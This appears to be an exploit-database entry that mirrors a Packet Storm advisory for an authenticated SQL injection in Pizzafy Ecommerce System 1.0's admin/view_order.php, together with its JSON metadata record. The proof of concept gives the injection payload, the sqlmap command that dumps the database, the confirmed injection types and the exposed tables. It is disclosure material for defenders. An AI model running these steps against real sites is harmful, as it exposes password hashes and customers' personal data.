📄 Pizzafy Ecommerce System 1.0 SQL Injection_PACKETSTORM:220076

Description

The admin/vieworder.php endpoint in Pizzafy Ecommerce System version 1.0 fails to properly sanitize the id GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading...

Visit Original Source

Basic Information

ID PACKETSTORM:220076

Published Apr 29, 2026 at 00:00

Affected Product

Affected Versions # SQL Injection in Pizzafy Ecommerce System — `admin/view_order.php`

## Details

| Field | Value |
|---|---|
| **Vendor** | SourceCodester |
| **Product** | Pizzafy Ecommerce System using PHP and MySQL |
| **Version** | 1.0 |
| **Vulnerability** | SQL Injection |
| **CWE** | CWE-89 |
| **CVSSv3 Score** | 7.2 (High) |
| **Attack Vector** | Network |
| **Auth Required** | Yes (Administrator) |
| **Researcher** | Xmyronn |
| **Date** | 2026-04-11 |

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html

---

## Affected Component

**File:** `Pizzafy/admin/view_order.php`
**Parameter:** `id` (GET)

---

## Description

The `admin/view_order.php` endpoint in Pizzafy Ecommerce System 1.0 fails to properly sanitize the `id` GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading to full database compromise.

---

## Proof of Concept

### Step 1 — Login as Administrator

Navigate to:
```
http://localhost/pizzafy/Pizzafy/admin/index.php
```
Login with admin credentials.

### Step 2 — Navigate to Orders

```
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
```
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212106" src="https://github.com/user-attachments/assets/b415920d-d2c9-42f6-9ecb-0e3579b7e399" />

Click **View Order** on any order entry.
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212116" src="https://github.com/user-attachments/assets/9d8db0fb-a08f-445d-9592-818636531009" />

### Step 3 — Intercept Request in Burp Suite

The intercepted GET request looks like:
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212135" src="https://github.com/user-attachments/assets/3149154e-853f-4a88-81dc-be00a209df2f" />

### Step 4 — Trigger SQL Error

Modify `id=1` to `id='`:
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212145" src="https://github.com/user-attachments/assets/506ae221-64b0-42e9-a959-ecadfa5029e9" />

```
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
```

**Response — MySQL error exposed:**

```
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
```

### Step 5 — Exploit with sqlmap

Save the request to `view_order.txt` and run:

```bash
sqlmap -r view_order.txt --dump --batch
```
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212406" src="https://github.com/user-attachments/assets/438e9b26-4927-462d-b3db-234d77626a84" />

**sqlmap confirmed injection types:**

| Type | Title |
|---|---|
| Boolean-based blind | AND boolean-based blind — WHERE clause |
| Error-based | MySQL >= 5.0 FLOOR error-based |
| Time-based blind | MySQL >= 5.0.12 SLEEP |
| UNION query | Generic UNION query — 11 columns |

**Full database dumped:**

```
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
```

Sensitive data exposed includes bcrypt password hashes, customer emails, order details, and system configuration.

---

## Impact

A malicious authenticated administrator (or attacker who has obtained admin credentials) can:
- Dump the full database including password hashes
- Read sensitive customer PII (names, emails, addresses, phone numbers)
- Potentially write to the database

---

## References

- [SourceCodester — Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command.

{
    "lastseen": "2026-04-29T17:03:48",
    "description": "The admin/vieworder.php endpoint in Pizzafy Ecommerce System version 1.0 fails to properly sanitize the id GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading...",
    "published": "2026-04-29T00:00:00",
    "modified": "2026-04-29T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Pizzafy Ecommerce System 1.0 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220076",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-7394"
    ],
    "sourceData": "# SQL Injection in Pizzafy Ecommerce System \u2014 `admin/view_order.php`\n    \n    ## Details\n    \n    | Field | Value |\n    |---|---|\n    | **Vendor** | SourceCodester |\n    | **Product** | Pizzafy Ecommerce System using PHP and MySQL |\n    | **Version** | 1.0 |\n    | **Vulnerability** | SQL Injection |\n    | **CWE** | CWE-89 |\n    | **CVSSv3 Score** | 7.2 (High) |\n    | **Attack Vector** | Network |\n    | **Auth Required** | Yes (Administrator) |\n    | **Researcher** | Xmyronn |\n    | **Date** | 2026-04-11 |\n    \n    https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html\n    \n    ---\n    \n    ## Affected Component\n    \n    **File:** `Pizzafy/admin/view_order.php`  \n    **Parameter:** `id` (GET)\n    \n    ---\n    \n    ## Description\n    \n    The `admin/view_order.php` endpoint in Pizzafy Ecommerce System 1.0 fails to properly sanitize the `id` GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading to full database compromise.\n    \n    ---\n    \n    ## Proof of Concept\n    \n    ### Step 1 \u2014 Login as Administrator\n    \n    Navigate to:\n    ```\n    http://localhost/pizzafy/Pizzafy/admin/index.php\n    ```\n    Login with admin credentials.\n    \n    ### Step 2 \u2014 Navigate to Orders\n    \n    ```\n    http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders\n    ```\n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-11 212106\" src=\"https://github.com/user-attachments/assets/b415920d-d2c9-42f6-9ecb-0e3579b7e399\" />\n    \n    \n    Click **View Order** on any order entry.\n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-11 212116\" src=\"https://github.com/user-attachments/assets/9d8db0fb-a08f-445d-9592-818636531009\" />\n    \n    \n    ### Step 3 \u2014 Intercept Request in Burp Suite\n    \n    The intercepted GET request looks like:\n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-11 212135\" src=\"https://github.com/user-attachments/assets/3149154e-853f-4a88-81dc-be00a209df2f\" />\n    \n    \n    ### Step 4 \u2014 Trigger SQL Error\n    \n    Modify `id=1` to `id='`:\n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-11 212145\" src=\"https://github.com/user-attachments/assets/506ae221-64b0-42e9-a959-ecadfa5029e9\" />\n    \n    ```\n    GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1\n    ```\n    \n    **Response \u2014 MySQL error exposed:**\n    \n    ```\n    Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;\n    check the manual that corresponds to your MariaDB server version for the right\n    syntax to use near ''' at line 1 in\n    C:\\xampp\\htdocs\\pizzafy\\Pizzafy\\admin\\view_order.php:15\n    ```\n    \n    ### Step 5 \u2014 Exploit with sqlmap\n    \n    Save the request to `view_order.txt` and run:\n    \n    ```bash\n    sqlmap -r view_order.txt --dump --batch\n    ```\n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-11 212406\" src=\"https://github.com/user-attachments/assets/438e9b26-4927-462d-b3db-234d77626a84\" />\n    \n    \n    **sqlmap confirmed injection types:**\n    \n    | Type | Title |\n    |---|---|\n    | Boolean-based blind | AND boolean-based blind \u2014 WHERE clause |\n    | Error-based | MySQL >= 5.0 FLOOR error-based |\n    | Time-based blind | MySQL >= 5.0.12 SLEEP |\n    | UNION query | Generic UNION query \u2014 11 columns |\n    \n    **Full database dumped:**\n    \n    ```\n    Database: pizzafy\n    Tables: users, user_info, orders, order_list, product_list, category_list, system_settings\n    ```\n    \n    Sensitive data exposed includes bcrypt password hashes, customer emails, order details, and system configuration.\n    \n    ---\n    \n    ## Impact\n    \n    A malicious authenticated administrator (or attacker who has obtained admin credentials) can:\n    - Dump the full database including password hashes\n    - Read sensitive customer PII (names, emails, addresses, phone numbers)\n    - Potentially write to the database\n    \n    ---\n    \n    ## References\n    \n    - [SourceCodester \u2014 Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)\n    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command.",
    "sourceHref": "https://packetstorm.news/download/220076",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220076/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply